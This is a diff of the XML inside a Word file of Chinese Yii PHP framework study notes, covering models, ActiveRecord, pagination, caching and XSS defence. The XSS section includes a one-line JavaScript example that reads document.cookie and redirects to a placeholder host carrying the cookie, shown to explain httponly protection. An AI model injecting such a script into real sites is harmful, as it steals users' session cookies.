-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>msg</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">="hello world"){//action </w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">($msg="hello world"){//action </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11735,7 +10705,6 @@
               </w:rPr>
               <w:t>下的</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -11743,7 +10712,6 @@
               </w:rPr>
               <w:t>mian</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -11769,21 +10737,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>return $this-&gt;render("hello",['message'=&gt;$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>msg</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>]);</w:t>
+              <w:t>return $this-&gt;render("hello",['message'=&gt;$msg]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11841,11 +10795,9 @@
             <w:r>
               <w:t>为</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>php</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>文件，名称要与</w:t>
             </w:r>
@@ -11890,18 +10842,8 @@
                 <w:b/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>php</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>.php</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -11940,7 +10882,6 @@
             <w:r>
               <w:t>普通模型）或</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -11950,7 +10891,6 @@
             <w:r>
               <w:t>Record</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>（数据包关联）</w:t>
             </w:r>
@@ -12012,21 +10952,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">class </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>EntryForm</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> extends Model{</w:t>
+              <w:t>class EntryForm extends Model{</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12199,21 +11125,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>[['</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>name','email</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'],'required'],</w:t>
+              <w:t>[['name','email'],'required'],</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12239,21 +11151,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>['</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>email','email</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>']</w:t>
+              <w:t>['email','email']</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12309,21 +11207,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">public function </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>actionEntry</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>(){</w:t>
+              <w:t>public function actionEntry(){</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12343,21 +11227,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t xml:space="preserve">$model=new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>EntryForm</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t>$model=new EntryForm();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12377,21 +11247,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>if ($model-&gt;load(\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Yii</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">::$app-&gt;request-&gt;post()) </w:t>
+              <w:t xml:space="preserve">if ($model-&gt;load(\Yii::$app-&gt;request-&gt;post()) </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12545,7 +11401,6 @@
             <w:tcW w:w="6439" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -12553,7 +11408,6 @@
               </w:rPr>
               <w:t>ActiveRecord</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -12591,7 +11445,6 @@
             <w:r>
               <w:t>）</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>C</w:t>
             </w:r>
@@ -12599,20 +11452,11 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t>onfig</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>onfig/</w:t>
+            </w:r>
             <w:r>
               <w:t>db.php</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -12648,35 +11492,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>yii</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>db</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>\Connection',</w:t>
+              <w:t xml:space="preserve">    'class' =&gt; 'yii\db\Connection',</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12690,49 +11506,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>dsn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>' =&gt; '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>mysql:host</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>=</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>localhost;dbname</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>=test',</w:t>
+              <w:t xml:space="preserve">    'dsn' =&gt; 'mysql:host=localhost;dbname=test',</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12746,21 +11520,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'username' =&gt; '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>barret</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>',</w:t>
+              <w:t xml:space="preserve">    'username' =&gt; 'barret',</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12824,11 +11584,9 @@
               </w:rPr>
               <w:t>模型继承</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>ActiveRecord</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -12877,21 +11635,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">class Country extends </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>ActiveRecord</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>{</w:t>
+              <w:t>class Country extends ActiveRecord{</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -12996,21 +11740,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$countries = Country::find()-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>orderBy</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>('name')-&gt;all();</w:t>
+              <w:t>$countries = Country::find()-&gt;orderBy('name')-&gt;all();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13088,21 +11818,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$country = Country::</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>findOne</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>('US');</w:t>
+              <w:t>$country = Country::findOne('US');</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13283,7 +11999,6 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -13291,26 +12006,17 @@
               </w:rPr>
               <w:t>Yii</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>自带分页插件：</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>yii</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>\data\</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>yii\data\</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13370,21 +12076,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>defaultPageSize</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>' =&gt; 5,  //</w:t>
+              <w:t>'defaultPageSize' =&gt; 5,  //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13410,21 +12102,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>totalCount</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>' =&gt; $query-&gt;count(), //</w:t>
+              <w:t>'totalCount' =&gt; $query-&gt;count(), //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13501,21 +12179,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$countries Country::find()-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>orderBy</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>('name')</w:t>
+              <w:t>$countries Country::find()-&gt;orderBy('name')</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13794,64 +12458,34 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">use </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>yii</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>\widgets\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
+              <w:t>use yii\widgets\LinkPager;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">echo </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>LinkPager</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">echo </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>LinkPager</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -14247,14 +12881,12 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>activeRecoed</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -14564,28 +13196,12 @@
               </w:rPr>
               <w:t>多表关联查询：</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>hasMany</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>hasOne</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>hasMany/hasOne</w:t>
+            </w:r>
             <w:r>
               <w:t>设置关联关系并获取数据</w:t>
             </w:r>
@@ -15462,14 +14078,12 @@
             <w:r>
               <w:t>（</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>l</w:t>
             </w:r>
             <w:r>
               <w:t>astModified</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>），浏览器知道页面没有修改之后，直接使用缓存的页面显示。</w:t>
             </w:r>
@@ -15565,7 +14179,6 @@
               </w:rPr>
               <w:br/>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
@@ -15573,26 +14186,41 @@
                 <w:szCs w:val="21"/>
                 <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               </w:rPr>
-              <w:t>lastModified</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+              <w:t>lastModified=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
                 <w:szCs w:val="21"/>
                 <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               </w:rPr>
-              <w:t>=</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                 <w:color w:val="0070C0"/>
                 <w:szCs w:val="21"/>
                 <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>function()</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+              <w:br/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+              <w:br/>
             </w:r>
             <w:r>
               <w:rPr>
@@ -15601,23 +14229,7 @@
                 <w:szCs w:val="21"/>
                 <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               </w:rPr>
-              <w:t>function()</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
-                <w:color w:val="0070C0"/>
-                <w:szCs w:val="21"/>
-              </w:rPr>
-              <w:br/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
-                <w:color w:val="0070C0"/>
-                <w:szCs w:val="21"/>
-              </w:rPr>
-              <w:br/>
+              <w:t>//2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -15626,7 +14238,15 @@
                 <w:szCs w:val="21"/>
                 <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               </w:rPr>
-              <w:t>//2</w:t>
+              <w:t>、根据内容变化缓存</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="0070C0"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+              <w:br/>
             </w:r>
             <w:r>
               <w:rPr>
@@ -15635,35 +14255,7 @@
                 <w:szCs w:val="21"/>
                 <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
               </w:rPr>
-              <w:t>、根据内容变化缓存</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
-                <w:color w:val="0070C0"/>
-                <w:szCs w:val="21"/>
-              </w:rPr>
-              <w:br/>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
-                <w:color w:val="0070C0"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-              </w:rPr>
-              <w:t>etagSeed</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
-                <w:color w:val="0070C0"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-              </w:rPr>
-              <w:t>=&gt;function(){</w:t>
+              <w:t>etagSeed=&gt;function(){</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15778,11 +14370,9 @@
             <w:r>
               <w:t>）</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>javascript</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>攻击</w:t>
             </w:r>
@@ -15791,11 +14381,9 @@
             <w:r>
               <w:t>例如：盗取账号和</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>httponly</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -15809,33 +14397,11 @@
               </w:rPr>
               <w:t xml:space="preserve">  </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>var</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> cookie = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>document.cookie</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>;</w:t>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>var cookie = document.cookie;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15845,33 +14411,11 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>window.location.href</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>='http://127.0.0.1/index.</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>php?cookie</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'+cookie;</w:t>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>window.location.href='http://127.0.0.1/index.php?cookie'+cookie;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15896,28 +14440,24 @@
               </w:rPr>
               <w:t>时附带</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>httponly</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>，这样可以防止通过</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>javascript</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -15973,11 +14513,9 @@
             <w:r>
               <w:t>允许浏览器执行参数中的</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>js</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>代码：</w:t>
             </w:r>
@@ -16028,22 +14566,18 @@
             <w:r>
               <w:t>参数中加入</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>js</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>代码：</w:t>
             </w:r>
             <w:r>
               <w:t>经过</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>url</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>编码和</w:t>
             </w:r>
@@ -16112,14 +14646,12 @@
             <w:r>
               <w:t xml:space="preserve"> )  </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>xss</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -16229,14 +14761,12 @@
               </w:rPr>
               <w:t>转码</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>js</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
